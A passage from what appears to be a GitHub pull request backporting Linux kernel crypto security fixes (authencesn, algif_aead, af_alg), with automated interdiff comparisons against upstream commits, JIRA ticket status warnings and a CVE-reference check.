 	skcipher_request_set_tfm(skreq, ctx->null);
 	skcipher_request_set_callback(skreq, aead_request_flags(req),
 				      NULL, NULL);
-	skcipher_request_set_crypt(skreq, src, dst, len, NULL);
+	skcipher_request_set_crypt(skreq, req->src, req->dst, len, NULL);
 
 	return crypto_skcipher_encrypt(skreq);
 }
 
-static int crypto_authenc_esn_copy(struct aead_request *req, unsigned int len)
-{
-	return crypto_authenc_esn_copy_sg(req, req->src, req->dst, len);
-}
-
 static int crypto_authenc_esn_encrypt(struct aead_request *req)
 {
 	struct crypto_aead *authenc_esn = crypto_aead_reqtfm(req);
@@ -260,7 +252,6 @@
 	struct scatterlist *dst = req->dst;
 	u8 *ihash = ohash + crypto_ahash_digestsize(auth);
 	u32 tmp[2];
-	int err;
 
 	if (!authsize)
 		goto decrypt;
@@ -270,11 +261,8 @@
 		scatterwalk_map_and_copy(tmp, dst, 4, 4, 0);
 		scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 0);
 		scatterwalk_map_and_copy(tmp, dst, 0, 8, 1);
-	} else {
-		err = crypto_authenc_esn_copy(req, assoclen);
-		if (err)
-			return err;
-	}
+	} else
+		memcpy_sglist(dst, src, assoclen);
 
 	if (crypto_memneq(ihash, ohash, authsize))
 		return -EBADMSG;
@@ -323,8 +311,13 @@
 	if (assoclen < 8)
 		return -EINVAL;
 
-	if (!authsize)
-		goto tail;
+	cryptlen -= authsize;
+
+	if (req->src != dst) {
+		err = crypto_authenc_esn_copy(req, assoclen + cryptlen);
+		if (err)
+			return err;
+	}
 
 	cryptlen -= authsize;
 	scatterwalk_map_and_copy(ihash, req->src, assoclen + cryptlen,
@@ -342,10 +335,7 @@
 
 		src = scatterwalk_ffwd(areq_ctx->src, src, 8);
 		dst = scatterwalk_ffwd(areq_ctx->dst, dst, 4);
-		err = crypto_authenc_esn_copy_sg(req, src, dst,
-						 assoclen + cryptlen - 8);
-		if (err)
-			return err;
+		memcpy_sglist(dst, src, assoclen + cryptlen - 8);
 		dst = req->dst;
 	}
 

################################################################################
!    REJECTED PATCH2 HUNKS - could not be compared; manual review needed       !
################################################################################

--- b/crypto/authencesn.c
+++ b/crypto/authencesn.c
@@ -268,10 +274,8 @@
 	if (assoclen < 8)
 		return -EINVAL;
 
-	cryptlen -= authsize;
-
-	if (req->src != dst)
-		memcpy_sglist(dst, req->src, assoclen + cryptlen);
+	if (!authsize)
+		goto tail;
 
 	scatterwalk_map_and_copy(ihash, req->src, assoclen + cryptlen,
 				 authsize, 0);

================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/authencesn.c
+++ b/crypto/authencesn.c
@@ -233,10 +204,9 @@
-			      crypto_ahash_alignmask(auth) + 1);
+	u8 *ohash = areq_ctx->tail;
 	unsigned int cryptlen = req->cryptlen - authsize;
 	unsigned int assoclen = req->assoclen;
 	struct scatterlist *dst = req->dst;
 	u8 *ihash = ohash + crypto_ahash_digestsize(auth);
 	u32 tmp[2];
-
 	if (!authsize)
 		goto decrypt;
 
@@ -296,11 +254,8 @@
 
 	cryptlen -= authsize;
 
-	if (req->src != dst) {
-		err = crypto_authenc_esn_copy(req, assoclen + cryptlen);
-		if (err)
-			return err;
-	}
+	if (req->src != dst)
+		memcpy_sglist(dst, req->src, assoclen + cryptlen);
 
 	scatterwalk_map_and_copy(ihash, req->src, assoclen + cryptlen,
 				 authsize, 0);
  • ⚠️ PR commit 2ebd3230218c (crypto: algif_aead - snapshot IV for async AEAD requests) → upstream 5aa58c3a572b
    Differences found:
================================================================================
*    DELTA DIFFERENCES - code changes that differ between the patches          *
================================================================================

--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -224,7 +224,7 @@
 
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
-			       areq->first_rsgl.sgl.sg, used, iv);
+			       areq->first_rsgl.sgl.sg, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);
 

################################################################################
!    REJECTED PATCH2 HUNKS - could not be compared; manual review needed       !
################################################################################

--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -193,7 +199,7 @@
 
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
-			       areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);
+			       areq->first_rsgl.sgl.sgt.sgl, used, iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);
 

================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -69,5 +69,5 @@
-	struct crypto_aead *tfm = aeadc->aead;
-	struct crypto_skcipher *null_tfm = aeadc->null_tfm;
+	struct af_alg_ctx *ctx = ask->private;
+	struct crypto_aead *tfm = pask->private;
 	unsigned int as = crypto_aead_authsize(tfm);
 	struct af_alg_async_req *areq;
 	struct scatterlist *rsgl_src, *tsgl_src = NULL;
@@ -212,7 +184,7 @@
 
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
-			       areq->first_rsgl.sgl.sg, used, ctx->iv);
+			       areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);

This is an automated interdiff check for backported commits.

@github-actions

github-actions Bot commented May 1, 2026

Copy link
Copy Markdown

JIRA PR Check Results

10 commit(s) with issues found:

Commit 2ebd3230218c

Summary: crypto: algif_aead - snapshot IV for async AEAD requests

⚠️ Warnings:

  • VULN-181877: No time logged - please log time manually

Commit 47a3951a0929

Summary: crypto: algif_aead - Fix minimum RX size check for decryption

⚠️ Warnings:

  • VULN-181877: No time logged - please log time manually

Commit 128b49565240

Summary: crypto: authencesn - reject short ahash digests during instance creation

⚠️ Warnings:

  • VULN-181877: No time logged - please log time manually

Commit f50e3313629b

Summary: crypto: authencesn - Fix src offset when decrypting in-place

⚠️ Warnings:

  • VULN-181877: No time logged - please log time manually

Commit 18b86ddf564d

Summary: crypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption

⚠️ Warnings:

  • VULN-181877: No time logged - please log time manually

Commit 15531398a6d3

Summary: crypto: authencesn - reject too-short AAD (assoclen<8) to match ESP/ESN spec

❌ Errors:

  • VULN-175565: Status is 'To Do', expected 'In Progress'

⚠️ Warnings:

  • VULN-175565: No time logged - please log time manually

Commit 83cd18971dc9

Summary: crypto: af_alg - Fix page reassignment overflow in af_alg_pull_tsgl

❌ Errors:

  • VULN-182987: Status is 'To Do', expected 'In Progress'

⚠️ Warnings:

  • VULN-182987: No time logged - please log time manually

Commit 547910e4c6ed

Summary: crypto: af_alg - limit RX SG extraction by receive buffer budget

❌ Errors:

  • VULN-182987: Status is 'To Do', expected 'In Progress'

⚠️ Warnings:

  • VULN-182987: No time logged - please log time manually

Commit c476c6e98ec6

Summary: crypto: algif_aead - Revert to operating out-of-place

⚠️ Warnings:

  • VULN-181877: No time logged - please log time manually

Commit 6f82c321961b

Summary: crypto: af-alg - fix NULL pointer dereference in scatterwalk

⚠️ Warnings:

  • VULN-181877: No time logged - please log time manually

Summary: Checked 10 commit(s) total.

@github-actions

github-actions Bot commented May 1, 2026

Copy link
Copy Markdown

Validation checks completed with issues View full results: https://github.com/ctrliq/kernel-src-tree/actions/runs/25199816085

kemotaha
kemotaha previously approved these changes May 1, 2026
@github-actions

github-actions Bot commented May 1, 2026

Copy link
Copy Markdown

🤖 Validation Checks In Progress Workflow run: https://github.com/ctrliq/kernel-src-tree/actions/runs/25199816085

@github-actions

github-actions Bot commented May 1, 2026

Copy link
Copy Markdown

🔍 Upstream Linux Kernel Commit Check

  • ❌ PR commit 18b86ddf564d (crypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption) references CVE-2026-31431 but
    upstream commit e02494114ebf has no CVE assigned

This is an automated message from the kernel commit checker workflow.

@github-actions

github-actions Bot commented May 1, 2026

Copy link
Copy Markdown

🔍 Interdiff Analysis

  • ⚠️ PR commit c476c6e98ec6 (crypto: algif_aead - Revert to operating out-of-place) → upstream a664bf3d603d
    Differences found:
================================================================================
*    DELTA DIFFERENCES - code changes that differ between the patches          *
================================================================================

--- b/crypto/af_alg.c
+++ b/crypto/af_alg.c
@@ -526,10 +526,12 @@
 /**
  * aead_count_tsgl - Count number of TX SG entries
  *
- * The counting starts from the beginning of the SGL to @bytes.
+ * The counting starts from the beginning of the SGL to @bytes. If
+ * an offset is provided, the counting of the SG entries starts at the offset.
  *
  * @sk socket of connection to user space
  * @bytes Count the number of SG entries holding given number of bytes.
+ * @offset Start the counting of SG entries from the given offset.
  * @return Number of TX SG entries found given the constraints
  */
 unsigned int af_alg_count_tsgl(struct sock *sk, size_t bytes)
@@ -563,12 +565,16 @@
  * aead_pull_tsgl - Release the specified buffers from TX SGL
  *
  * If @dst is non-null, reassign the pages to dst. The caller must release
- * the pages.
+ * the pages. If @dst_offset is given only reassign the pages to @dst starting
+ * at the @dst_offset (byte). The caller must ensure that @dst is large
+ * enough (e.g. by using af_alg_count_tsgl with the same offset).
  *
  * @sk socket of connection to user space
  * @used Number of bytes to pull from TX SGL
  * @dst If non-NULL, buffer is reassigned to dst SGL instead of releasing. The
  *	caller must release the buffers in dst.
+ * @dst_offset Reassign the TX SGL from given offset. All buffers before
+ *	       reaching the offset is released.
  */
 void af_alg_pull_tsgl(struct sock *sk, size_t used, struct scatterlist *dst)
 {
--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -211,13 +212,72 @@
 	/* Use the RX SGL as source (and destination) for crypto op. */
 	rsgl_src = areq->first_rsgl.sgl.sg;
 
-	err = crypto_aead_copy_sgl(null_tfm, tsgl_src, rsgl_src,
-				   ctx->aead_assoclen);
-	if (err)
-		goto free;
+	if (ctx->enc) {
+		/*
+		 * Encryption operation - The in-place cipher operation is
+		 * achieved by the following operation:
+		 *
+		 * TX SGL: AAD || PT
+		 *	    |	   |
+		 *	    | copy |
+		 *	    v	   v
+		 * RX SGL: AAD || PT || Tag
+		 */
+		err = crypto_aead_copy_sgl(null_tfm, tsgl_src,
+					   areq->first_rsgl.sgl.sg, processed);
+		if (err)
+			goto free;
+		af_alg_pull_tsgl(sk, processed, NULL, 0);
+	} else {
+		/*
+		 * Decryption operation - To achieve an in-place cipher
+		 * operation, the following  SGL structure is used:
+		 *
+		 * TX SGL: AAD || CT || Tag
+		 *	    |	   |	 ^
+		 *	    | copy |	 | Create SGL link.
+		 *	    v	   v	 |
+		 * RX SGL: AAD || CT ----+
+		 */
+
+		 /* Copy AAD || CT to RX SGL buffer for in-place operation. */
+		err = crypto_aead_copy_sgl(null_tfm, tsgl_src,
+					   areq->first_rsgl.sgl.sg, outlen);
+		if (err)
+			goto free;
+
+		/* Create TX SGL for tag and chain it to RX SGL. */
+		areq->tsgl_entries = af_alg_count_tsgl(sk, processed,
+						       processed - as);
+		if (!areq->tsgl_entries)
+			areq->tsgl_entries = 1;
+		areq->tsgl = sock_kmalloc(sk, array_size(sizeof(*areq->tsgl),
+							 areq->tsgl_entries),
+					  GFP_KERNEL);
+		if (!areq->tsgl) {
+			err = -ENOMEM;
+			goto free;
+		}
+		sg_init_table(areq->tsgl, areq->tsgl_entries);
+
+		/* Release TX SGL, except for tag data and reassign tag data. */
+		af_alg_pull_tsgl(sk, processed, areq->tsgl, processed - as);
+
+		/* chain the areq TX SGL holding the tag with RX SGL */
+		if (usedpages) {
+			/* RX SGL present */
+			struct af_alg_sgl *sgl_prev = &areq->last_rsgl->sgl;
+
+			sg_unmark_end(sgl_prev->sg + sgl_prev->npages - 1);
+			sg_chain(sgl_prev->sg, sgl_prev->npages + 1,
+				 areq->tsgl);
+		} else
+			/* no RX SGL present (e.g. authentication only) */
+			rsgl_src = areq->tsgl;
+	}
 
 	/* Initialize the crypto operation */
-	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
+	aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src,
 			       areq->first_rsgl.sgl.sg, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);

################################################################################
!    REJECTED PATCH2 HUNKS - could not be compared; manual review needed       !
################################################################################

--- b/crypto/af_alg.c
+++ b/crypto/af_alg.c
@@ -637,8 +637,7 @@
 /**
  * af_alg_count_tsgl - Count number of TX SG entries
  *
- * The counting starts from the beginning of the SGL to @bytes. If
- * an @offset is provided, the counting of the SG entries starts at the @offset.
+ * The counting starts from the beginning of the SGL to @bytes.
  *
  * @sk: socket of connection to user space
  * @bytes: Count the number of SG entries holding given number of bytes.
@@ -642,7 +641,6 @@
  *
  * @sk: socket of connection to user space
  * @bytes: Count the number of SG entries holding given number of bytes.
- * @offset: Start the counting of SG entries from the given offset.
  * Return: Number of TX SG entries found given the constraints
  */
 unsigned int af_alg_count_tsgl(struct sock *sk, size_t bytes, size_t offset)
@@ -676,9 +660,7 @@
  * af_alg_pull_tsgl - Release the specified buffers from TX SGL
  *
  * If @dst is non-null, reassign the pages to @dst. The caller must release
- * the pages. If @dst_offset is given only reassign the pages to @dst starting
- * at the @dst_offset (byte). The caller must ensure that @dst is large
- * enough (e.g. by using af_alg_count_tsgl with the same offset).
+ * the pages.
  *
  * @sk: socket of connection to user space
  * @used: Number of bytes to pull from TX SGL
@@ -682,8 +664,6 @@
  * @used: Number of bytes to pull from TX SGL
  * @dst: If non-NULL, buffer is reassigned to dst SGL instead of releasing. The
  *	 caller must release the buffers in dst.
- * @dst_offset: Reassign the TX SGL from given offset. All buffers before
- *	        reaching the offset is released.
  */
 void af_alg_pull_tsgl(struct sock *sk, size_t used, struct scatterlist *dst,
 		      size_t dst_offset)
--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -26,7 +26,6 @@
 #include <crypto/internal/aead.h>
 #include <crypto/scatterwalk.h>
 #include <crypto/if_alg.h>
-#include <crypto/skcipher.h>
 #include <linux/init.h>
 #include <linux/list.h>
 #include <linux/kernel.h>
@@ -72,7 +71,7 @@
 	struct alg_sock *pask = alg_sk(psk);
 	struct af_alg_ctx *ctx = ask->private;
 	struct crypto_aead *tfm = pask->private;
-	unsigned int i, as = crypto_aead_authsize(tfm);
+	unsigned int as = crypto_aead_authsize(tfm);
 	struct af_alg_async_req *areq;
 	struct af_alg_tsgl *tsgl, *tmp;
 	struct scatterlist *rsgl_src, *tsgl_src = NULL;
@@ -182,64 +177,7 @@
 	/* Use the RX SGL as source (and destination) for crypto op. */
 	rsgl_src = areq->first_rsgl.sgl.sgt.sgl;
 
-	if (ctx->enc) {
-		/*
-		 * Encryption operation - The in-place cipher operation is
-		 * achieved by the following operation:
-		 *
-		 * TX SGL: AAD || PT
-		 *	    |	   |
-		 *	    | copy |
-		 *	    v	   v
-		 * RX SGL: AAD || PT || Tag
-		 */
-		memcpy_sglist(areq->first_rsgl.sgl.sgt.sgl, tsgl_src,
-			      processed);
-		af_alg_pull_tsgl(sk, processed, NULL, 0);
-	} else {
-		/*
-		 * Decryption operation - To achieve an in-place cipher
-		 * operation, the following  SGL structure is used:
-		 *
-		 * TX SGL: AAD || CT || Tag
-		 *	    |	   |	 ^
-		 *	    | copy |	 | Create SGL link.
-		 *	    v	   v	 |
-		 * RX SGL: AAD || CT ----+
-		 */
-
-		/* Copy AAD || CT to RX SGL buffer for in-place operation. */
-		memcpy_sglist(areq->first_rsgl.sgl.sgt.sgl, tsgl_src, outlen);
-
-		/* Create TX SGL for tag and chain it to RX SGL. */
-		areq->tsgl_entries = af_alg_count_tsgl(sk, processed,
-						       processed - as);
-		if (!areq->tsgl_entries)
-			areq->tsgl_entries = 1;
-		areq->tsgl = sock_kmalloc(sk, array_size(sizeof(*areq->tsgl),
-							 areq->tsgl_entries),
-					  GFP_KERNEL);
-		if (!areq->tsgl) {
-			err = -ENOMEM;
-			goto free;
-		}
-		sg_init_table(areq->tsgl, areq->tsgl_entries);
-
-		/* Release TX SGL, except for tag data and reassign tag data. */
-		af_alg_pull_tsgl(sk, processed, areq->tsgl, processed - as);
-
-		/* chain the areq TX SGL holding the tag with RX SGL */
-		if (usedpages) {
-			/* RX SGL present */
-			struct af_alg_sgl *sgl_prev = &areq->last_rsgl->sgl;
-			struct scatterlist *sg = sgl_prev->sgt.sgl;
-
-			sg_unmark_end(sg + sgl_prev->sgt.nents - 1);
-			sg_chain(sg, sgl_prev->sgt.nents + 1, areq->tsgl);
-		} else
-			/* no RX SGL present (e.g. authentication only) */
-			rsgl_src = areq->tsgl;
-	}
+	memcpy_sglist(rsgl_src, tsgl_src, ctx->aead_assoclen);
 
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src,
@@ -242,7 +180,7 @@
 	}
 
 	/* Initialize the crypto operation */
-	aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src,
+	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
 			       areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);
--- b/include/crypto/if_alg.h
+++ b/include/crypto/if_alg.h
@@ -230,9 +230,8 @@
 	return PAGE_SIZE <= af_alg_rcvbuf(sk);
 }
 
-unsigned int af_alg_count_tsgl(struct sock *sk, size_t bytes, size_t offset);
-void af_alg_pull_tsgl(struct sock *sk, size_t used, struct scatterlist *dst,
-		      size_t dst_offset);
+unsigned int af_alg_count_tsgl(struct sock *sk, size_t bytes);
+void af_alg_pull_tsgl(struct sock *sk, size_t used, struct scatterlist *dst);
 void af_alg_wmem_wakeup(struct sock *sk);
 int af_alg_wait_for_data(struct sock *sk, unsigned flags, unsigned min);
 int af_alg_sendmsg(struct socket *sock, struct msghdr *msg, size_t size,

================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/af_alg.c
+++ b/crypto/af_alg.c
@@ -523,15 +523,15 @@
 /**
- * aead_count_tsgl - Count number of TX SG entries
+ * af_alg_count_tsgl - Count number of TX SG entries
  *
  * The counting starts from the beginning of the SGL to @bytes. If
- * an offset is provided, the counting of the SG entries starts at the offset.
+ * an @offset is provided, the counting of the SG entries starts at the @offset.
  *
- * @sk socket of connection to user space
- * @bytes Count the number of SG entries holding given number of bytes.
- * @offset Start the counting of SG entries from the given offset.
- * @return Number of TX SG entries found given the constraints
+ * @sk: socket of connection to user space
+ * @bytes: Count the number of SG entries holding given number of bytes.
+ * @offset: Start the counting of SG entries from the given offset.
+ * Return: Number of TX SG entries found given the constraints
  */
 unsigned int af_alg_count_tsgl(struct sock *sk, size_t bytes, size_t offset)
 {
-	struct alg_sock *ask = alg_sk(sk);
-	struct af_alg_ctx *ctx = ask->private;
+	const struct alg_sock *ask = alg_sk(sk);
+	const struct af_alg_ctx *ctx = ask->private;
@@ -546,4 +657,4 @@
-		struct scatterlist *sg = sgl->sg;
+		const struct scatterlist *sg = sgl->sg;
 
 		for (i = 0; i < sgl->cur; i++) {
 			size_t bytes_count;
@@ -571,16 +682,16 @@
- * aead_pull_tsgl - Release the specified buffers from TX SGL
+ * af_alg_pull_tsgl - Release the specified buffers from TX SGL
  *
- * If @dst is non-null, reassign the pages to dst. The caller must release
+ * If @dst is non-null, reassign the pages to @dst. The caller must release
  * the pages. If @dst_offset is given only reassign the pages to @dst starting
  * at the @dst_offset (byte). The caller must ensure that @dst is large
  * enough (e.g. by using af_alg_count_tsgl with the same offset).
  *
- * @sk socket of connection to user space
- * @used Number of bytes to pull from TX SGL
- * @dst If non-NULL, buffer is reassigned to dst SGL instead of releasing. The
- *	caller must release the buffers in dst.
- * @dst_offset Reassign the TX SGL from given offset. All buffers before
- *	       reaching the offset is released.
+ * @sk: socket of connection to user space
+ * @used: Number of bytes to pull from TX SGL
+ * @dst: If non-NULL, buffer is reassigned to dst SGL instead of releasing. The
+ *	 caller must release the buffers in dst.
+ * @dst_offset: Reassign the TX SGL from given offset. All buffers before
+ *	        reaching the offset is released.
  */
 void af_alg_pull_tsgl(struct sock *sk, size_t used, struct scatterlist *dst,
 		      size_t dst_offset)
--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -25,5 +25,4 @@
 #include <crypto/if_alg.h>
 #include <crypto/skcipher.h>
-#include <crypto/null.h>
 #include <linux/init.h>
 #include <linux/list.h>
@@ -73,6 +69,6 @@
-	struct aead_tfm *aeadc = pask->private;
-	struct crypto_aead *tfm = aeadc->aead;
-	struct crypto_skcipher *null_tfm = aeadc->null_tfm;
+	struct alg_sock *pask = alg_sk(psk);
+	struct af_alg_ctx *ctx = ask->private;
+	struct crypto_aead *tfm = pask->private;
 	unsigned int i, as = crypto_aead_authsize(tfm);
 	struct af_alg_async_req *areq;
 	struct af_alg_tsgl *tsgl, *tmp;
@@ -214,7 +184,7 @@
 	 */
 
 	/* Use the RX SGL as source (and destination) for crypto op. */
-	rsgl_src = areq->first_rsgl.sgl.sg;
+	rsgl_src = areq->first_rsgl.sgl.sgt.sgl;
 
 	if (ctx->enc) {
 		/*
@@ -227,10 +197,8 @@
 		 *	    v	   v
 		 * RX SGL: AAD || PT || Tag
 		 */
-		err = crypto_aead_copy_sgl(null_tfm, tsgl_src,
-					   areq->first_rsgl.sgl.sg, processed);
-		if (err)
-			goto free;
+		memcpy_sglist(areq->first_rsgl.sgl.sgt.sgl, tsgl_src,
+			      processed);
 		af_alg_pull_tsgl(sk, processed, NULL, 0);
 	} else {
 		/*
@@ -244,11 +212,8 @@
 		 * RX SGL: AAD || CT ----+
 		 */
 
-		 /* Copy AAD || CT to RX SGL buffer for in-place operation. */
-		err = crypto_aead_copy_sgl(null_tfm, tsgl_src,
-					   areq->first_rsgl.sgl.sg, outlen);
-		if (err)
-			goto free;
+		/* Copy AAD || CT to RX SGL buffer for in-place operation. */
+		memcpy_sglist(areq->first_rsgl.sgl.sgt.sgl, tsgl_src, outlen);
 
 		/* Create TX SGL for tag and chain it to RX SGL. */
 		areq->tsgl_entries = af_alg_count_tsgl(sk, processed,
@@ -271,10 +236,10 @@
 		if (usedpages) {
 			/* RX SGL present */
 			struct af_alg_sgl *sgl_prev = &areq->last_rsgl->sgl;
+			struct scatterlist *sg = sgl_prev->sgt.sgl;
 
-			sg_unmark_end(sgl_prev->sg + sgl_prev->npages - 1);
-			sg_chain(sgl_prev->sg, sgl_prev->npages + 1,
-				 areq->tsgl);
+			sg_unmark_end(sg + sgl_prev->sgt.nents - 1);
+			sg_chain(sg, sgl_prev->sgt.nents + 1, areq->tsgl);
 		} else
 			/* no RX SGL present (e.g. authentication only) */
 			rsgl_src = areq->tsgl;
@@ -283,5 +248,5 @@
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src,
-			       areq->first_rsgl.sgl.sg, used, ctx->iv);
+			       areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);
@@ -482,4 +447,4 @@
-	struct crypto_aead *tfm = aeadc->aead;
+	struct crypto_aead *tfm = pask->private;
 	unsigned int ivlen = crypto_aead_ivsize(tfm);
 
 	af_alg_pull_tsgl(sk, ctx->used, NULL, 0);
--- b/crypto/algif_skcipher.c
+++ b/crypto/algif_skcipher.c
@@ -319,7 +360,7 @@
 	struct alg_sock *pask = alg_sk(psk);
 	struct crypto_skcipher *tfm = pask->private;
 
 	af_alg_pull_tsgl(sk, ctx->used, NULL, 0);
 	sock_kzfree_s(sk, ctx->iv, crypto_skcipher_ivsize(tfm));
-	sock_kfree_s(sk, ctx, ctx->len);
-	af_alg_release_parent(sk);
+	if (ctx->state)
+		sock_kzfree_s(sk, ctx->state, crypto_skcipher_statesize(tfm));
--- b/include/crypto/if_alg.h
+++ b/include/crypto/if_alg.h
@@ -228,8 +229,5 @@
 
-int af_alg_alloc_tsgl(struct sock *sk);
 unsigned int af_alg_count_tsgl(struct sock *sk, size_t bytes, size_t offset);
 void af_alg_pull_tsgl(struct sock *sk, size_t used, struct scatterlist *dst,
 		      size_t dst_offset);
-void af_alg_free_areq_sgls(struct af_alg_async_req *areq);
-int af_alg_wait_for_wmem(struct sock *sk, unsigned int flags);
 void af_alg_wmem_wakeup(struct sock *sk);
  • ⚠️ PR commit 547910e4c6ed (crypto: af_alg - limit RX SG extraction by receive buffer budget) → upstream 8eceab19eba9
    Differences found:
================================================================================
*    DELTA DIFFERENCES - code changes that differ between the patches          *
================================================================================

--- b/crypto/algif_skcipher.c
+++ b/crypto/algif_skcipher.c
@@ -90,14 +90,8 @@
 	 * If more buffers are to be expected to be processed, process only
 	 * full block size buffers.
 	 */
-	if (ctx->more || len < ctx->used) {
-		if (len < bs) {
-			err = -EINVAL;
-			goto free;
-		}
-
+	if (ctx->more || len < ctx->used)
 		len -= len % bs;
-	}
 
 	/*
 	 * Create a per request TX SGL for this request which tracks the

################################################################################
!    REJECTED PATCH2 HUNKS - could not be compared; manual review needed       !
################################################################################

--- b/crypto/algif_skcipher.c
+++ b/crypto/algif_skcipher.c
@@ -130,6 +130,11 @@
 	 * full block size buffers.
 	 */
 	if (ctx->more || len < ctx->used) {
+		if (len < bs) {
+			err = -EINVAL;
+			goto free;
+		}
+
 		len -= len % bs;
 		cflags |= CRYPTO_SKCIPHER_REQ_NOTFINAL;
 	}

================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/algif_skcipher.c
+++ b/crypto/algif_skcipher.c
@@ -87,7 +87,6 @@
 	 * full block size buffers.
 	 */
-	if (ctx->more || len < ctx->used)
+	if (ctx->more || len < ctx->used) {
 		len -= len % bs;
-
-	/*
-	 * Create a per request TX SGL for this request which tracks the
+		cflags |= CRYPTO_SKCIPHER_REQ_NOTFINAL;
+	}
  • ⚠️ PR commit 15531398a6d3 (crypto: authencesn - reject too-short AAD (assoclen<8) to match ESP/ESN spec) → upstream 2397e9264676
    Differences found:
================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/authencesn.c
+++ b/crypto/authencesn.c
@@ -290,6 +253,6 @@
 	u32 tmp[2];
 	int err;
 
 	cryptlen -= authsize;
 
-	if (req->src != dst) {
+	if (req->src != dst)
  • ⚠️ PR commit 18b86ddf564d (crypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption) → upstream e02494114ebf
    Differences found:
================================================================================
*    DELTA DIFFERENCES - code changes that differ between the patches          *
================================================================================

--- b/crypto/authencesn.c
+++ b/crypto/authencesn.c
@@ -179,10 +179,7 @@
 	authenc_esn_request_complete(areq, err);
 }
 
-static int crypto_authenc_esn_copy_sg(struct aead_request *req,
-				      struct scatterlist *src,
-				      struct scatterlist *dst,
-				      unsigned int len)
+static int crypto_authenc_esn_copy(struct aead_request *req, unsigned int len)
 {
 	struct crypto_aead *authenc_esn = crypto_aead_reqtfm(req);
 	struct crypto_authenc_esn_ctx *ctx = crypto_aead_ctx(authenc_esn);
@@ -191,16 +188,11 @@
 	skcipher_request_set_tfm(skreq, ctx->null);
 	skcipher_request_set_callback(skreq, aead_request_flags(req),
 				      NULL, NULL);
-	skcipher_request_set_crypt(skreq, src, dst, len, NULL);
+	skcipher_request_set_crypt(skreq, req->src, req->dst, len, NULL);
 
 	return crypto_skcipher_encrypt(skreq);
 }
 
-static int crypto_authenc_esn_copy(struct aead_request *req, unsigned int len)
-{
-	return crypto_authenc_esn_copy_sg(req, req->src, req->dst, len);
-}
-
 static int crypto_authenc_esn_encrypt(struct aead_request *req)
 {
 	struct crypto_aead *authenc_esn = crypto_aead_reqtfm(req);
@@ -260,7 +252,6 @@
 	struct scatterlist *dst = req->dst;
 	u8 *ihash = ohash + crypto_ahash_digestsize(auth);
 	u32 tmp[2];
-	int err;
 
 	if (!authsize)
 		goto decrypt;
@@ -270,11 +261,8 @@
 		scatterwalk_map_and_copy(tmp, dst, 4, 4, 0);
 		scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 0);
 		scatterwalk_map_and_copy(tmp, dst, 0, 8, 1);
-	} else {
-		err = crypto_authenc_esn_copy(req, assoclen);
-		if (err)
-			return err;
-	}
+	} else
+		memcpy_sglist(dst, src, assoclen);
 
 	if (crypto_memneq(ihash, ohash, authsize))
 		return -EBADMSG;
@@ -323,8 +311,13 @@
 	if (assoclen < 8)
 		return -EINVAL;
 
-	if (!authsize)
-		goto tail;
+	cryptlen -= authsize;
+
+	if (req->src != dst) {
+		err = crypto_authenc_esn_copy(req, assoclen + cryptlen);
+		if (err)
+			return err;
+	}
 
 	cryptlen -= authsize;
 	scatterwalk_map_and_copy(ihash, req->src, assoclen + cryptlen,
@@ -342,10 +335,7 @@
 
 		src = scatterwalk_ffwd(areq_ctx->src, src, 8);
 		dst = scatterwalk_ffwd(areq_ctx->dst, dst, 4);
-		err = crypto_authenc_esn_copy_sg(req, src, dst,
-						 assoclen + cryptlen - 8);
-		if (err)
-			return err;
+		memcpy_sglist(dst, src, assoclen + cryptlen - 8);
 		dst = req->dst;
 	}
 

################################################################################
!    REJECTED PATCH2 HUNKS - could not be compared; manual review needed       !
################################################################################

--- b/crypto/authencesn.c
+++ b/crypto/authencesn.c
@@ -268,10 +274,8 @@
 	if (assoclen < 8)
